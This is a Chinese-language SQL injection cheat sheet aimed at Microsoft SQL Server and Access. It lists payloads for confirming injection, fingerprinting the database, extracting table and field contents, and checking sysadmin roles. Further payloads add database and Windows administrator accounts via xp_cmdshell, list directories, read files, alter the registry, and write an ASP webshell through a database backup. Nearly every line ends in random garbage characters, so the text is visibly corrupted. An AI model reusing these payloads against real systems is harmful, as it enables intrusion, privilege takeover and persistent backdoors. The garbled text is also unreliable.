1.判断是否有注入;and 1=1 ;and 1=2 w�9O!L9 �6
2.初步判断是否是mssql ;and user>0 d"Wuu1tE�Y
u4m8^fj+�T
3.注入参数是字符'and [查询条件] and ''=' �YG8)`X�qC
@7.7+blS"H
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �#M+_Lk3�
"��Jg.)1Jw
5.判断数据库系统 H�270)Cwn+
k*\�)z�\�f
;and (select count(*) from sysobjects)>0 mssql 4gN���N� "
J]{<Z?%���
;and (select count(*) from msysobjects)>0 access z,2*3�Be6V
$� Y�^0�l�
) ��jvI Nb
re}�PpXRC�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r)�K5<[\r�
&�/��)B d%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8"-=+w.�CZ
�~�/z%y��g
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��~w|h;*Bj
�'gg�<�)Bd
9.(1)猜字段的ascii值(access) yG7H>LF�?8
^�~7Mv^A��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z9g6%RbwX
fiD,HG�x
i
(2)猜字段的ascii值(mssql) SBs!��5��2
S_OtY]gF�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 M6^�
\LtFt
�cL;�%2TMk
10.测试权限结构(mssql) \@N~{7�2:k
%iEdU��V\$
N�qNU:�_�}
3(,�m(+J[S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ���y,ub*-:
ud�B�IEW,`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N}ND�()bf�
'g'R�XC}D>
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- .s!0S-Rk�C
jWi~Q� o�+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- gT�Ox|b��x
:�
xg���go
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- "e8EA!Ipte
qBh@^GxY),
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �oSkQ/5hg.
-1�v���9�
;and 1=(select IS_MEMBER('db_owner'));-- r Dl�u�&�
�Nq8 3 6HL
�Unt�Fk�oO
�{Q���_GJ
11.添加mssql和系统的帐户 �C<I�?4W�M
Qzo -Yw�`=
;exec master.dbo.sp_addlogin username;-- d^��!k{Qx'
;exec master.dbo.sp_password null,username,password;-- I��}0��?�d
!�k*B-�@�F
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _�5~|z$G�W
_X;,,VE�V!
;exec master.dbo.xp_cmdshell 'net user username password ZeU){�C�B�
5p ��S$rf
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ec�oI-@CAI
�8�sc2��r�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Y�GLq���~A
v~�T)g"_|
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- i$@�xb��_�
�D6&P9e_�5
jl(D��;JnF
E QU@�';~8
12.(1)遍历目录 UXdc'i �g�
Qj_��)^3`e
;create table dirs(paths varchar(100), id int) z���uW4g�J
�HR8YP�U5
;insert dirs exec master.dbo.xp_dirtree 'c:\' X';qcn_^��
V6HZvuXV!�
;and (select top 1 paths from dirs)>0 jQ%1lQ#R)�
"5�
��~��{
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) C,W_�0=�!e
A:GqR;;"x>
.PVYYhr�t�
Y�9<[n)>�+
(2)遍历目录 �:/s�zA?:W
f'(F���'TE
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3'`��&D�/n
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �"#7Q}�d!x
f77W{T��4�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 !�-4�7�0�J
�F1-�"yX1B
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 eLOR�G(;h4
7����=}�tJ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 xZ;e���V76
�<Z�3C�&BM
\ m��o�LQ
{�nUmlP=mS
13.mssql中的存储过程 U+�ik& R#�
[�m�
h>�N$
xp_regenumvalues 注册表根键, 子键 jLI1�E��d�
�*P/A&"i[E
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �a6.�/;O�C
��5��0-7L,
xp_regread 根键,子键,键值名 �tugI��OA�
-��bOt�F�%
;exec xp_regread �Cy�6!?Mik
w`f�66*@Q1
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �m�H�ju$d�
Is3�Y>�o�X
xp_regwrite 根键,子键, 值名, 值类型, 值 9=]HOU��n�
[qRww]g;P|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �=0Y���0o_
UR�_�Ty5�9
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 sfw*�_}��y
�x,��10o��
xp_regdeletevalue 根键,子键,值名 �3MHpP5��C
p19(>��|$J
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R$�
+RTG:E
�9v*y&V�9/
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 <5pNFj}0;X
T��r:@Dv.O
�o����Yf+I
a ��B�MV6'
14.mssql的backup创建webshell ��x/M$_E<G
e4�Y�+u8gT
use model =UK:�83�R(
R-�-s
u�:
create table cmd(str image); �'�*rS,��y
�&R4?]��I
insert into cmd(str) values (''); Tb?�X��KO,
_���$@fCo0
backup database model to disk='c:\l.asp'; �KNQj U�-A
Y_ne?/�sZE
�U9�b�[��t
exi�u;\+j�
15.mssql内置函数 c�Rr3!<E�Z
;r�"r1'a+@
;and (select @@version)>0 获得Windows的版本号 %gF�I�u�.c
(�(`{-�y\K
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �e#�h�&X�a
;0oL*d[1Z�
;and (select user_name())>0 爆当前系统的连接用户 JB'�tc!�!*
� X{�V���s
;and (select db_name())>0 得到当前连接的数据库 9H4"=!AAgD
'h6��G"�=+
O^-Qq�CZE�
#'%ii,;w�Q
16.简洁的webshell :'�ZR�!��w
�,JK0N_�=
use model R��+u��Zi~
���~Uv#�)�
create table cmd(str image); L�s�IZ�eL^
!BkE-9v?w
insert into cmd(str) values (''); �}D�jVZ48�
�!\%JOf}��
backup database model to disk='g:\wwwtest\l.asp';
